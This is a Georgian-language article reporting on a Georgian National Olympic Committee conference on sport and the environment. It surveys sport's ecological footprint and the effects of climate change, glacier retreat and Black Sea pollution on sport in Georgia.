RSS

საქართველოს ოლიმპიურმა კომიტეტმა დეკლარაცია მიიღო – სპორტი და გარემო

14 ივნ

IMG_2736საქართველოს ეროვნული ოლიმპიური კომიტეტში, დღეს ჩატარდა კონფერენცია თემაზე „სპორტი და გარემო“, ეს იყო საქართველოში პირველი შეხვედრა, სადაც ოლიმპიურმა კომიტეტმა მიიღო დეკლარაცია, რომელშიც ნათქვამი იყო, რომ „საქართველოს ეროვნული ოლიმპიური კომიტეტისა და მისი რეგიონალური ორგანიზაციების წარმომადგენელი დელეგატები, სპორტის ეროვნული ფედერაციები, საქართველოს გარემოს დაცვისა და ბუნებრივი რესურსების სამინისტროს წარმომადგენლები, ექსპერტები, სხვა დაინტერესებული ორგანიზაციები, ვიწონებთ მოცემულ დეკლარაციის დებულებებს, რომელიც განსაზღვრავს ძირითად დირექტივებსა და უმთავრეს პრინციპებს ქვეყნის ფარგლებში სპორტისა და გარემოსთვის დაკავშირებული აქტივობების შემდგომი მართვისა და რეგულირების მიზნით, ყველა შესაბამისი სტრუქტურის პირდაპირი და ქმედითი ჩართულობით.

საქართველოს მაგალითზე ძირითადი გამოწვევაა: სპორტის სფეროში გარემოს მდგრადი განვითარების საკითხების გათვალისწინება. სპორტის ზეგავლენის გამოყენება გარემოსთან დაკავშირებული ინფორმირებულობის დომის ამაღლების მიზნით, არა მხოლოდ სპორტული საზოგადოების ფარგლებში, არამედ ზოგადად ფართო საზოგადოებაში… “

კონფერენციაში მონაწილეობდნენ: ლერი ხაბელოვი -სეოკის პრეზიდენტი, ემზარ ზენაიშვილი – სეოკ-ის გენერალური მდივანი, თეიმურაზ მურღულია – გარემოსა და ბუნებრივი რესურსების დაცვის მინსიტრის პირველი მოადგილე, ოლიკო ცისკარიშვილი – თბილისის სასწავლო უნივერსიტეტის პროფესორი, პორტალ www.ekofact.com დამფუძნებელი, გურამ ძაგანია – საქართველოს ფიზიკური აღზრდისა და სპორტის სახელმწიფო სასწავლო უნივერსიტეტის რექტორი, ხათუნა ხუტაშვილი – საქართველოს ფიზიკური აღზრდისა და სპორტის სახელმწიფო სასწავლო უნივერსიტეტის პროფესორი, ნანა თალაკვაძე – გარემოსა და ბუნებრივი რესურსების კომიტეტის აპარატის უფროსი, ანატოლი კორეპანოვი, საქართველოს სახელმწიფო მინისტრის აპარატის, ევროინტეგრაციის საკითხთა კოორდინაციის დეპარტამენტის ანალიტიკური სამმართველოს უფროსი, სპორტში საერთაშორისო ექსპერტი, მარინა გორგობიანი – საქართველოს იზიკური აღზრდისა და სპორტის სახელმწიფო სასწავლო უნივერსიტეტის პროფესორი, ლელა აფციაური – ეროვნული ოლიმპიური აკადემიის პრეზიდენტი. ზ.კახაბრიშვილი ოლიმპიური ნაკრები გუნდების მთ.ექიმი; სპორტული მედიცინის ასოციაციის გენერალური მდივანი.

სპორტისა და გარემოს დაცვის პრობლემის განხილვისას, ცენტრალურ ადგილს იკავებს ჯანმრთელობა, და ყველა საკითხი შეიძლება განვიხილოთ, სწორედ ამ კუთხით.

თავის მხრივ, გარემოს დაცვითი პრობლემები ისე მწვავედ დგას, რომ შეუძლებელია გვერდი აუარო, რითიც არ უნდა იყოს ადამიანი დაკავებული. ის, ადამიანის მოღვაწეობის ყველა სფეროში იჭრება, და წარმოადგენს ეკონომიკისა და სოციალურ სფეროს ფუნდამენტურ კომპონენტს.

ურთიერთკავშირი ჯანმრთელობასა და გარემოს დაცვასთან, ჯანმრთელობა და სპორტი (ფიზიკური კულტურა) იმდენად ნათელია, რომ ამის მტკიცება უხერხულიც კია.

სპორტის საკითხები, მისი განვითარება და გარემოს დაცვითი პრიორიტეტები უფრო და უფრო მეტ მნიშვნელობას იძენს და საერთაშორისო ორგანიზაციების უფრო მეტ ყურადღების ცენტრში ექცევა.

ჯერ კიდევ, 1994 წელს unicef-მა დაიწყო მუშაობა სპორტისა და გარემოს დამოკიდებულებაზე. მათ ურთიერთთანამშრომლობის ფორმებზე, სპორტული ორგანიზაციების ინტერესების განვითარებაზე – სპორტის, როგორც  გამაჯანსაღებელი ერთობა გარემოსთან კავშირში. ამგვარად, სპორტს შეუძლია თავისი წვლილი შეიტანოს ჯანსაღი გარემოს შენარჩუნებისთვის. ისევე, როგორც გარემოს დამცველებს, სპორტულ ორგანიზაციებსაც შეუძლიათ სპორტის განვითარება და იმოქმედონ  ადამიანების ჯანმრთელობაზე.

 

რატომ დადგა ეს საკითხი?

უპირველესად, აღსანიშნავია, რომ სპორტი მჭიდრო კავშირშია ბუნებასთან. ჯანსაღი გარემო, აუცილებელია ჯანსაღი სპორტისთვის. ბევრი ათლეტისთვის, სწორედ ბუნებასთან სიახლოვეა მოტივაცია. მეორე მხრივ, არაჯანსაღი გარემო ადამიანებს უსპობს სურვილს მისდიონ სპორტს. სწორედ, ამიტომ შეიძლება დაიმარხოს სიცოცხლესუნარიანობა ისეთი ადგილების, სადაც შეიძლება სპორტული ღონისძიებები ჩატარდეს.

მეორეც, სპორტი ეს უზარმაზარი ინდუსტრიაა. მისი საერთო ფინანსური ბრუნვა მსოფლიო მასშტაბით, ეკონომიკური საქმიანობების 3 პროცენტზე მეტს შეადგენს. მაგალითად, დიდ ბრიტანეთში, ამ სფეროს ფინანსური ბრუნვა  ავტომანქანების ფინანსურ ბრუნვას უტოლდება.  მხოლოდ საერთაშორისო ოლიმპიური კომიტეტი გამოიმუშავებს 2 მილიარდ აშშ დოლარზე მეტს, სპონსორობისა და ტელეტრანსლიაციების გაყიდვებით. როგორც ნებისმიერმა სხვა ინდუსტრიამ, სპორტმაც არ შეიძლება არ დატოვოს თავისი „ეკოლოგიური კვალი“ ბუნებაში.

სპორტს შეუძლია დიდი გავლენა მოახდინოს გარემოზე, როგორც დადებითი, ასევე უარყოფითი. ის, თუ როგორ ტარდება სპორტული ღონისძიებები, როგორ აკეთებენ ბიზნესს სპორტული ორგანიზაციები, როგორ იქცევიან სპორტის ვარსკვლავები სპორტულ მოედნებზე და მის გარეთ, შეიძლება ამ ყველაფერს ღრმა შედეგები ჰქონდეს.

 

სპორტის გავლენა გარემოზე

ყველაფერი, რასაც ჩვენ ვაკეთებთ, ყველაფერი ახდენს გავლენას გარემოზე. მაგალითად: სპორტში მწვანე საფარის შენარჩუნება საჭიროებს პესტიციდებისა და გერბიციდების გამოყენებას, ასევე მილიონ ლიტრამდე წყალს წელიწადში. საცურაო აუზებში იყენებენ ქლორს წყლის გასაწმენდად, გასახდელებიც კი ქლორით იწმინდება. ქლორიანი წყალი კი ჩაედინება მდინარეებში. მსხვილი სპორტული ღონისძიებების შემდეგ  უამრავი ნარჩენი რჩება. მხოლოდ უბრალო კალათბურთის, თუ ფეხბურთის მატჩების დროს, აშშ-ში ყრიან 50 ათას პლასტიკურ ბოთლს. საქართველოში, უამრავის საფეხბურთო და რაგბის მოედანია, მხოლოდ მიხეილ მესხის სახელობის ვაკის სტადიონს 24 ათასს მაყურებელზე აქვს გათვლილი სკამები. რეაბილიტაციამდე, სტადიონი 40 ათას მაყურებელს იტევდა. მისი ისტორია კი იწყება გასული საუკუნის დასაწყისიდან – 1910 წლიდან.

დათვლილია, რომ ყოველი მაყურებელი ტოვებს 2 კგ-მდე საკვებ ნარჩენს, მათ შორის უმრავლესობა საჭიროებს გადამუშავებას. ეს მხოლოდ მცირე ილუსტრაციაა იმისა, სპორტი როგორ გავლენას ახდენს გარემოზე.

მთლიანობაში, სტანდარტული სპორტული ობიექტების ექსპლუატაცია  და სპორტული ღონისძიებების ჩატარება ელექტროენერგიის მოხმარებას მოითხოვს, ბინძურდება ჰაერი, გროვდება უამრავი ნარჩენი. ეს ყველაფერი კი საბოლოო ჯამში, ანგრევს ოზონის შრეს, ამ ყველაფერს მივყავართ ბიოლოგიური სახეობების დაკარგვამდე, ბიომრავალფეროვნების დარღვევამდე, მიწის ეროზიამდე, ჰაერის დაბინძურებამდე.

რამდენიმე კვირის წინ, ლონდონში Greenpeace-ის წარმომადგენლებმა 17 ქანდაკებას აირწინაღები გაუკეთეს, რითაც სიმბოლურად გააპროტესტეს ჰაერის დაბინძურება. მათივე კვლევით, დაბინძურებული ჰაერი ლონდონში ყოველწლიურად 10 000 ადამიანის გარდაცვალების მიზეზი ხდება.

სპორტული საქონლის მწარმოებლები და მსხვილი სპორტული ღონისძიებების ორგანიზატორები, როგორიცაა ოლიმპიური თამაშები, მსოფლიო ჩემპიონატები ფეხბურთსა თუ სხვა სახეობებში, საჭიროებს მრავალათასიან თანამშრომელს. ისინი გამოიმუშავებენ და მოიხმარენ უამრავი რაოდენობით რესურსს, აწარმოებენ მილიონობით მოსახმარებელ საქონელს, მოიხმარენ ელეტროენერგიასა და წყალს, ისინი წარმოადგენენ მყარი ნარჩენების წყაროს, ითვისებენ მიწას და იყენებენ უამრავი რაოდენობის სატრანსპორტო საშუალებებს. ამრიგად, თუმცა სპორტული ორგანიზაციები იშვიათად არიან გარემოს დამაბინძურებლები, მათი „ეკოლოგიური კვალი“ მაინც მნიშვნელოვნად ღრმაა გარემოში. სპორტული აღჭურვილობა, სპორტული ტანსაცმელი, სპორტული ობიექტები – ყველაფერი ტოვებს თავის ეკოლოგიურ კვალს გარემოში.

 

მყარი ნარჩენები

ორიოდე სიტყვით შევჩერდებით ნყარ ნარჩენებზე. ისევე, როგორც მსოფლიოს სხვადასხვა ინდუსტრიები სპორტის ინდუსტრიაც უამრავ ნარჩენს ტოვებს.

ნარჩენების რაოდენობა, რომელსაც წარმოქმნის კაცობრიობა, სერიოზულ საშიშროებას წარმოადგენს გარემოსთვის. ოკეანეში იმდენად დიდი რაოდენობის ნარჩენი გროვდება, რომ აშშ-ს დასავლეთ სანაპიროდან 1 600 კმ მანძილზე წარმოიქმნა უზარმაზარი ნაგვის კუნძული, რომლის ფართობი ორჯელ აღემატება ისეთი ქვეყნის ფართობს, როგორიცაა უკრაინა. ეს კუნძული არ ქრება, არ იხრწნება, რადგან იქ დაგროვილი ნარჩენების მნიშვნელოვან ნაწილს პლასტმასა შეადგენს, რომელიც ბიოქიმიურ დაშლას არ ექვემდებარება. მეცნიერთა შეფასებით, პოლიეთილენის დაშლისათვის ბუნებრივ პირობებში საჭიროა მინიმუმ 500 წელი.  ჩვენს მიერ მოხმარებული ნარჩენები, ყოველწლიურად, ერთ მილიონ ზღვის ფრინველისა და 100 000 კუს, სელაპის, ვეშაპისა და სხვა ზღვის ძუძუმწოვრების დაღუპვის მიზეზი ხდება.

განვითარებული ქვეყნები ცდილობენ, შეამცირონ ნარჩენების წარმოშობა. ყოველწლიურად, ევროკავშირის წევრ ქვეყნებში წარმოიშობა დაახლოებით ორი მილიარდი ტონა ნარჩენი. ეს რაოდენობა, სახიფათო ნარჩენების ჩათვლით, ყოველწლიურად იზრდება. ნარჩენების განვითარება და მათი პირდაპირი განადგურება (მაგალითად დაწვით) სახიფათოა, როგორც ადამიანის ჯანმრთელობისთვის, ასევე გარემოსთვის. ამ პრობლემის საუკეთესო გადაწვეტაა, ნარჩენების შემცირება წარმოშობის პროცესში და მათი გადამუშავება (რეციკლირება) ახალი პროდუქციის მიღების მიზნით.

მსოფლიო ბანკის ბოლოდროინდელი კვლევების მიხედვით, განვითარებად ქვეყნებში მუნიციპალიტეტები თავიანთი წლიური ბიუჯეტის 20-50 % ჩვეულებრივ ხარჯავენ მყარი ნარჩენების მართვაზე (ძირითადად გავრცელებულია ღია ნაგავსაყრელები და ღია დაწვა.) ამის მიუხედავად,  ნარჩენების მთელი რაოდენობის 30-60%, მაინც უკუნტროლოა და მოსახლეობის 50%-ზე მეტის მომსახურეობა საერთოდ ვერ ხერხდება.

როგორც სხვაგან, ასევე სპორტული ღონისძიებების დროს, ნარჩენების არასწორმა მოპყრობამ, შენახვამ, შეგროვებამ და განთავსებამ, როდესაც შეგროვებული ნაგავი, უბრალოდ, უკონტროლოდ იყრება მიწაზე, შეიძლება საკმაოდ დიდი რისკი შეუქმნას ადამიანის ჯანმრთელობას და გარემოს. განსაკუთრებით მნიშვნელოვანია ეს მჭიდროდ დასახლებულ პუნქტებში, სადაც ურბანიზაციის სწრაფი ტემპით ზრდასა და მოსახლეობის ცხოვრების დონის ამაღლებასთან ერთად წარმოიქმნება კატასტროფულად დიდი რაოდენობის ნარჩენები. მყარი ნარჩენების არასწორი მართვის შედეგია ადამიანებისა და ცხოველების დაავადებები და მნიშვნელოვანი ეკონომიკური, გარემოსდაცვითი და ბიოლოგიური დანაკარგები.

განვითარებად ქვეყნებში ნარჩენების მართვას ბევრი სიძნელე და წინააღმდეგობა ეღობება წინ, როგორიცაა მაგალითად, დაბალი ტექნიკური გამოცდილება და მცირე ფინანსური რესურსი, რომლებიც ძირითადად მხოლოდ შეგროვებასა და ტრანსპორტირებას ფარავს და ისიც არასათანადოდ.

მყარი ნარჩენების მართვისადმი ინტეგრირებული მიდგომა მიზნად ისახავს ნარჩენების მართვის სხვადასხვა ასპექტსა და მათი დამუშავების მრავალფეროვანი ტექნოლოგიების ერთმანეთთან დაკავშირებას.

საქართველოში, სადაც 63 ნაგავსაყრელია, მხოლოდ ორია სანიტარული ნაგავსაყრელი (თბილისისა და რუსთავ-გარდაბნის), რომლებიც შეესაბამება საერთაშორისო სტანდარტებს. ქვეყანაში მათ გარდა, უამრავი უკანონო ნაგავსაყრელებია.

ნარჩენებს ხშირად პირდაპირ მდინარეებთან ყრიან, კახეთში, პირადიპრ ალაზანში. ნარჩენები სპონტანურად იყრება ხევებსა და მდინარეებში. მაღალმთიან რეგიონების მოსახლეობა საყოფაცხოვრებო ნარჩენებს ხევებსა და  პირდაპირ მდინარეში ყრის, ამის ნათელი მაგალითია, სვანეთში, მესტიის მიმდებარე ტერიტორიაზე არსებული თვითნებური ნაგავსაყრელი, სვანეთში კი განვითარებულია სამთოსათხილამურო სპორტი და გარკვეულწილად, ამ სახეობის მიმდევრევრებიც უნებლიედ ხდებიან გარემოს დამაბინძურებლები.

 

სხვა ინდუსტრიებთან ერთად, სპორტული ინდუსტრიაც თუ კარგად არ დავფიქრდით და შესაბამისად არ ვიმოქმედეთ და არ ვიფიქრეთ ჩვენი პლანეტის ეკოსისტემაზე და ჯანსაღ გარემოზე, სპორტულმა მოღვაწეობამ შეიძლება მიგვიყვანოს:

  • ეკოსისტემის დარღვევამდე;
  • გარემოს ხმაურისა და სინათლის დაბინძურებმდე;
  • არააღდგენითი რესურსების დიდი რაოდენობით გამოყენება (საწვავი, რკინა და ა.შ.), ასევე ბუნებრივი რესურსები (წყალი, ხე და ა.შ.)
  • დამატებითი ემისიები გამონაბოლქვი გაზების, ელეტროენერგიისა და სხვადასხვა ტიპის საწვავის მოხმარებისას;
  • ოზონის შრის რღვევა (მაცივრების ტიპის ტექნიკის გამოყენებისას);
  • მიწისა და წყლის რესურსების დაბინძრება, პესტიციდების გამოყენებისას;

მიწის ეროზია სპორტული ობიექტების მშენებლობისას და მოედნებზე სპორტული შეჯიბრებებისას გულშემატკივართა ქმედებების გამო;

დიდი რაოდენობით ყველანაირი სახის ნარჩენების წარმოქმნა სპორტული ობიექტებიდან და სპორტული თამაშების გულშემატკივრებიდან.

 

გარემოს გავლენა სპორტულ მოღვაწეობაზე

თავის მხრივ, გარემო ახდენს გავლენას სპორტულ ცხოვრებაზე.

დღევანდელ დღეს, ძალიან ბევრს საუბრობენ გლობალურ კლიმატურ ცვლილებებსა და გლობალურ დათბობაზე. ამის ნიშნები კი უფრო და უფრო ბევრია. 90-იანი წლები იყო, ყველაზე თბილი ბოლო 50 წლის განმავლობაში.

 

კლიმატური ცვლილებების გავლენა

მეცნიერული პროგნოზის თანახმად, კლიმატის ცვლილების ამჟამინდელი ტემპით გაგრძელების შემთხვევაში, XXI საუკუნის ბოლოსათვის, გლობალური საშუალო ტემპერატურა გაიზრდება 1,4-5,8C-ით. ხოლო ზღვის დონე, სავარაუდოდ, აიწევს 9-დან 88 სანტიმეტრამდე 1990 წელთან შედარებით, რაც შესაბამისად გაამძაფრებს ბუნებრივ კატაკლიზმებს მთელს მსოფლიოში.

შეიცვლება და გადაგვარდება ეკოსისტემები, ზოგიერთი მათგანი საერთოდ გაქრება, შეიცვლება ცხოველთა, მცენარეთა სახეობების გავრცელების არე.

 

კლიმატური ცვლილებების შეგეგი იქნება:

ცხელი დღეები/ღამეების რაოდენობის მატება და ცივი დღეების რაოდენობის კლება; წყალზე მოთხოვნილების მატება და აორთქლებასთან დაკავშირებული დანაკარგები, მძიმე გვალვები ნალექიანობა  საყოველთაოდ მოიმატებს მაღალ განედებზე და დაიკლებს საშუალო განედებზე; წყლის ნაკლებობა ტყეებსა და სათიბებზე, რაც იწვევს მეტ ტყის ხანძარს; ტროპიკული ციკლონების ინტენსივობის მატება ზღვის ზედაპირის ტემპერატურის მატებასთან ერთად უფრო ხშირი და ინტენსიური შტორმული ტალღები; ნიაღვრების და ფართომასშტაბიანი წყალდიდობების სიხშირის მატება;  თოვლის ადრეული დნობა და მყინვარების დნობა, ამით წყალდიდობების ინტენსიფიცირება ზოგი რეგიონი განიცდის უფრო ხშირ და უფრო მძიმე გვალვებს.

არქტიკაში ტემპერატურამ მოიმატა 3-4 გრადუსით. უკანასკნელი 70 წლის განმავლობაში, არქტიკის ყინული 3 პროცენტით მცირდება. აშშ-ს მკვლევართა მონაცემებით, 24 წლიან პერიოდში, თანამგზავრებიდან დაკვირვებით იკვეთება, რომ ჩრდილოეთ ყინულოვანი ოკეანემ მიაღწია რეკორდულად დაბალ მაჩვენებელს.

კენიაში, ცნობილი ყინულოვანი აღმართი კენიის მთაზე, ალმაზის ხეობაში, რომელიც მუდამ იზიდავდა ტურისტებს მსოფლიოს ყველა ქვეყნიდან, უბრალოდ დადნა.

 

კლიმატური ცვლილებები საქართველოში

გლობალური დათბობის შედეგები უკვე ფიქსირდება  საქართველოში. უკანასკნელი 50 წლის განმავლობაში,  დედოფლისწყაროში იმატა გვალვების სიმკაცრემ.  გვალვიანი პერიოდის საშუალო ხანგრძლივობა 54 დღიდან 72 დღემდე გაიზარდა, ხოლო ძლიერი ქარების  განმეორებადობამ XX საუკუნის 80-იანი წლებიდან  5-ჯერ მოიმატა.

* უკანასკნელ წლებში გაიზარდა იმ დღეთა რიცხვი  პერიოდში, როცა დღის მაქსიმალური ტემპერატურა >25ºС (ცხელ დღეთა რიცხვი). ასეთ დღეთა რიცხვი,  მაგ., ბორჯომისა და ახალციხის მუნიციპალიტეტებში  გაიზარდა, შესაბამისად, 173 (დაახლოებით 10%) და 280  დღით (დაახლოებით 13%).

* 1985-2000 წწ. ცენტრალური კავკასიონის მყინვართა  შესწავლამ აჩვენა, რომ ამ წლებში მყინვართა უკან  დახევის საშუალო სიჩქარემ 8 მ/წელი შეადგინა, ხოლო  მყინვართა ფართობმა 6-9%-ით დაიკლო. აქვე უნდა  აღინიშნოს, რომ უკანასკნელ წლებში მყინვარის უკან დახევის ტემპმა მნიშვნელოვნად მოიმატა. ეს კი მნიშვნელოვნად მოქმედებს სათხულამურო სპორტის განვითარებაზე, აფერხებს ასევე მთამსვლელთა, ანუ მეკლდეურობისა და კლდეზე ცოცვის განვითარებას.

საქართველო მთიანი ქვეყანაა და მთამსვლელობას დიდი ტრადიციები აქვს. ყველაზე ძნელად დასაპყრობი მწვერვალი ევროპაში, შხარაა. ურთულესია დასაპყრობი მწვერვალებისკენ გასავლელი გზა და სპეციალურ მომზადებასა და ვარჯიშს საჭიროებს. ეს გზა უფრო და უფრო რთულდება, რადგან კლიმატური ცვლილებები მყინვარებზე ყველაზე ნათლად აისახება.

სვანეთში, მდინარე მესტიაჭალის სათავე მყინვარი ჭალაათი, გამორჩეული მყინვარია და ტყის ზონაში მთავრდება. მყინვარი უკენ იწევს და ტყე ფეხდაფეხ მიყვება. ბოლო მონაცემებით, ენციკლოპედიებში, მყინვარის სიმაღლე 1880 მეტრია დაფიქსირებული, თუმცა  ბოლო 23 წლის განმავლობაში, მყინვარმა  ზევით აიწია და ორი წლის წინ, გეოლოგების კვლევების თანახმად, მყინვარის უკან დახევის მაჩვენებელი  12,5 მეტრი იყო. თუმცა წინა წლებში დაფიქსირდა 15-17 მეტრიანი უკან დახევაც. შარშან კი, 2015 წელს, წინა წელთან შედარებით, მყინვარმა 15,7 მეტრით უკან დაიხია. მყინვარის უკან დაწევამ გამოიწვია მილიონობით კუბური მეტრი მეწყერისა და ღვარცოფის წამოსვლა. ასეთი მეწყერ-ღვარცოფების უეცარი წამოსვლა, ნამდვილად საფრთხე წარმოადგენს მეკლდეურთათვის და არა მხოლოდ მათთვის, უამრავი  ტურისტი, ადამიანები, რომლებიც მისდევენ სპორტს დასვენების მიზნით, საფრთხის წინაშე დგებიან.

კვლევების თანახმად, ბევრი მაღალმთიანი სათხილამური კურორტი დგება ეკონომიკური კრიზისის პრობლემების წინაშე, ბევრი მათგანი კოტრდება კიდეც, სწორედ, გლობალური დათბობის გამო. ციურიხის უნივერსიტეტის ექსპერტების აზრით, თოვლის მოსვლის პროგნოზი სულ უფრო და უფრო არამდგრადია და არაპროგნოზირებადი მომავალ ათწლეულებში.  ისინი პროგნოზირებენ, რომ უახლოეს 20-30 წლის განმავლობაში, იმ კურორტებს, რომლებიც მდებარეობა 2000-2500 მეტრზე ექნებათ სერიოზული ეკონომიკური პრობლემები, სწორედ ნალექის (ამ შემთხვევაში თოვლის) არ მოსვლის გამო. საქართველოში, ასეთი მსხვილი სათხილამურო კურორტები, რომლებიც კლიმატურ ცვლილებებზე ხშირად არიან დამოკიდებულნი არის: სვანეთში – ჰაწვალი, ბაკურიანსა და გუდაურში. იგეგმება ახალი სათხილამურო ტრასის გახსნა გოდერძს უღელტეხილზეც.

 

ქვემო სვანეთი

* ეკოსისტემა მგრძნობიარეა სტიქიის სხვადასხვა  მოვლენის მიმართ წყალდიდობების, ზვავების,  ღვარცოფების მომეტებული სიხშირე, მიწის ეროზია უფრო ინტენსიური გახდა, და სოფლის მეურნეობას, ტყეებს, გზებსა და კომუნიკაციებს დიდი ზიანი მიაყენა

* უკანასკნელი ორმოცდაათი წლის განმავლობაში, საშუალო წლიურმა ტემპერატურამ 0.4°С-ით ხოლო ნალექიანობამ 8.0% -ით მოიმატა; წყალდიდობები უფრო ხშირია, უფრო უხვი (+9%), მაგრამ შემცირდა წყალდიდობების ხანგრძლივობა (-25%) 1980 წლის შემდეგ 43%–ით იმატა ზვავებმა.

2050 წლისათვის ტემპერატურის მოსალოდნელმა მატებამ შეიძლება გამოიწვიოს ქვემო სვანეთის მყინვარების სრული გაქრობა; ღვარცოფების ორჯერადი მატება; გვალვების გამოვლენის (+17%) და ხანგრძლივობის (+38%) მატება; პარაზიტებისა და დაავადებების გავრცელება ტყეებში, რომლებიც ტერიტორიის 60 %-ს ფარავს მყინვარების 25% – იანი კლება (1.2 კმ3 -დან 0.8კმ3 -მდე);

 

ზემო სვანეთი

მყინვარი ჭალაათი ყოველწლიურად იხევს უკან, 2015 წელს, 2014 წელთან შედარებით, მყინვარმა 15.6 მეტრით დაიხია. უკანასკნელი ათი წლის განმავლობაში, მყინვარმა 150 მეტრით დაიხია.

 

სხვა რეგიონები

სხვა რეგიონები, სადაც ხშირად დადიან ადგილობრივი თუ უცხოელი ტურისტები, ადამიანები, რომლებიც მისდევენ სპორტს დასვენების მიზნით.

2014 წელს მყინვარი დევდორაკიდან დაიძრა ღვარცოფი, ზარალი უზარმაზარი იყო, დაიღუპა ათობით ადამიანი.

თბილისში, 2015 წლის 13 ივნისს უხვმა ნალექმა გამოიწვია ვერეს ხეობის ადიდება, აქაც ზარალი რამდენიმე მილიონი და ადამიანთა მსხვერპლი.

2015 წლის აგვისტოს მეწყერული მოვლენები თუშეთისა და ხევსურეთის გზებზეც საგანგაშო იყო, თუმცა ამ შემთხვევაში, 600-ზე მეტი ტურისტი უვნებლად გადმოიყვანეს მაშველებმა. რაც შეეხება წყალდიდობებს ბათუმსა და ფოთში, და მთლიანად შავი ზღვის სანაპირო ზოლში, ეს პრობლემა უკვე მუდმივ ხასიათს ატარებს.

სხვა:

სხვა ასპექტია სპორტზე გარემოს გავლენა. კალიფორნიელმა მკვლევარებმა დაადგინეს, რომ იმ რაიონებში, სადაც ჰაერი დაბინძურებულია, ბავშვები, რომლებიც სპორტით არიან დაკავებულნი, სამჯერ უფრო მეტი რისქკის ქვეშ დგებიან, რომ დაავადდნენ ასთმით, ვიდრე მათი თანატოლები, რომლებიც სპორტს არ მისდევენ. თუ გავითვალისწინებთ, რომ სპორტი გვთავაზობს ჯანსაღ აქტივობას, ეს ძალიანს ამწუხარო სტატისტიკაა.

ანგარიში, რომელიც გამოქვეყნდა გლობალური სპორტული ალიანსის მიერ, რომელიც ეხება სპორტისა და გარემოს პრობლემებს, აჩვენებს, რომ ბევრი ადამიანი, რომელიც მისდევდა სპორტს დასვენების მიზნით, იძულებულნი არიან სპორტული აქტივობის ფორმა შეცვალონ.  ისინი იძულებულნი არიან მიმართონ სპეციალურ მალამობს და ხმარობენ გრძელ შორტებს, რათა აიცილონ თავიდან მზით დაწვის რისკი, ანდა კანის კიბო. უდიდესი პრობლემების წინაშე დგანა პარაოლიმპიელებიც, რომელთა ჯანმრთელობაც ისედაც შელახულია.

დიდია რისკი დაავადებების ზღვაზე დასვენებისას, რადგან ძალიან დაბინძურებულია, როგორც ზღვის სანაპიროები, ასევე წყალი. შავ ზღვას და შავი ზღვის ბინადრებს არა მხოლოდ ნაგავსაყრელი და ფეკალური მასები უქმნის საფრთხეს. შავი ზღვა ბინძურდება ნავთობპროდუქტებით. ძირითად პრობლემას წარმოადგენს ის, რომ ყველა ნავსადგომის ტექნიკური აღჭურვილობა და დამხმარე საინჟინრო ინფრასტრუქტურა გათვალისწინებულია მშრალი ტვირთების მიღებისათვის. მიუხედავად ამისა, პერიოდულად ადგილი აქვს თხევადი ტვირთების (ზეთები, გუდრონი და ა.შ.) მიღება-დამუშავებას, რაც გარემოსდაცვითი შეფასებით, კატეგორიულად დაუშვებელია. თხევადი ტვირთის ავარიული დაღვრის შემთხვევაში, შეუძლებელია ტრაპების/ჭების ბლოკირება, ისევე როგორც ნავმისადგომების ზედაპირზე არსებული სხვა დაზიანებული და ჩანგრეული ადგილებისა, საიდანაც დაღვრილი სითხე აგრეთვე მოხვდება პირდაპირ ზღვაში.

 

შავი ზღვის დაბიძურების გამო, საფრთხის ქვეშაა, საქართველოში არსებული იახტკლუბში გაწევრიანებული მოზარდებიცა და ტურუსტებიც, ადამიანები, რომლებიც მისდევენ სპორტს დასვენების მიზნით.

იახტკლუბი, სადაც საინტერესო და ძლიერი სპორტის მიმდევრებს ამზადებს, შავი ზღვის აკვატორიაში ერთადერთია და 1968 წლიდან არსებობს (1972-ში დამტკიცდა).

ეს ყველაზე მცირედი ჩამონათვალია, იმისა, თუ როგორ შეაქვს კორექტივები გარემოს დაბინძურებას სპორტზე.

 

შავი ზღვის სანაპირო ზონა

საქართველოში, შავი ზღვის ზონა,  კლიმატის ცვლილებების მხრივ, ყველაზე მგრძნობიარე ზონაა;

* ზღვის ზედაპირის ტემპერატურის 1.3°С – ით მატება 1990-2006 წლებში ამან შედეგად მოიტანა ჰაერის ტემპერატურის 0.2°С – ით მატება;

* ძლიერი შტორმების (სიმძლავრე 5-დან 7-მდე) სიხშირის სამჯერ მატება ფოთსა და ბათუმში გასული ოთხი დეკადის განმავლობაში;

* შტორმების და წყალმოვარდნების დროს იზრდება ადამიანთა მსხვერპლი, სტრესი, ტრავმები, ინფექციურ დაავადებათა გავრცელება, რაც განსაკუთრებით დიდი ზარალის გამომწვევი იქნება მჭიდროდ დასახლებულ, განვითარებული ინფრასტრუქტურის მქონე მდინარეთა დელტებში (ფოთი, ბათუმი). შტორმების, წყალმოვარდნების და ნაპირის მუდმივი ჩარეცხვა.

2010 წლის ზაფხულში აჭარის სანაპირო ზონაში აღინიშნა მიდიებისა და ხამანწკების მასობრივი დაღუპვა. გამოკვლევებით დადგინდა, რომ ეს მოვლენა განაპირობა ევროპიდან სითბოს ტალღის ხანგრძლივმა შემოჭრამ, რამაც გამოიწვია ზღვის ზედაპირული წყლის გათბობა 33 0C--მდე. მსგავსი მოვლენა გამეორდა 2011 წელსაც, როდესაც ზედაპირული წყალი 30 0C--მდე გაიზარდა და გაცილებით მეტ ხანს შეინარჩუნა ექსტრემალური მნიშვნელობა, ვიდრე წინა წელს.

 

წელს კი რამდენჯერმე ნაპირზე გამოირიყა მკვდარი დელფინები.

შავი ზღვა ბინძურდება არა მხოლოდ ხომალდებიდან ჩაღვრილი ფეკალური მასებითა და საწვავის ნარჩენებით, ხმელეთიდანაც. ბათუმის მახლობლად მდებარე ნაგავსაყრელიდან, დღემდე ჩაედინება ბინძური მასა ზღვაში და საფრთხეს უქმნის, როგორც ზღვას, ასევე ზღვაში მობანავე ტურისტებსაც.

საშიშროებები, რომელიც სპორტს ემუქრება გარემოს დაბინძურებისგან:

ჰაერის დაბინძურება შენობებსა და მის გარეთ, ტოქსიკური ქიმიური ნივთიერებები, პესტიციდები, დაბინძურებული წყალი, ხმაური, სიგარეტის ბოლი, ოზონის შრის დარღვევა, კლიმატური ცვლილებები, ბიომრავალფეროვნების დაკარგვა და ა.შ. ყველაფერი ეს შეიძლება იყოს გარკვეული დაავადებების წარმომშობი, რომელსაც მივყავართ სასუნთ გზების პრობლემებამდე. ფსიქოლოგიურ წნეხამდე, ჟანგბადის უკმარისობამდე, გაძლიერებულ ულტრაიისფერ დასხივებამდე, იმ ადგილების დაკარგვამდე, სადაც შეიძლება სპორტს მივსდიოთ. არაპროგნოზირებადმა და ექსტრემალურმა ამინდებმა შეიძლება შექმნას პრობლემები, რომ ადამიანები მთლიანობაში სპორტით დაკავდნენ.

რა არის მდგრადი განვითარება?

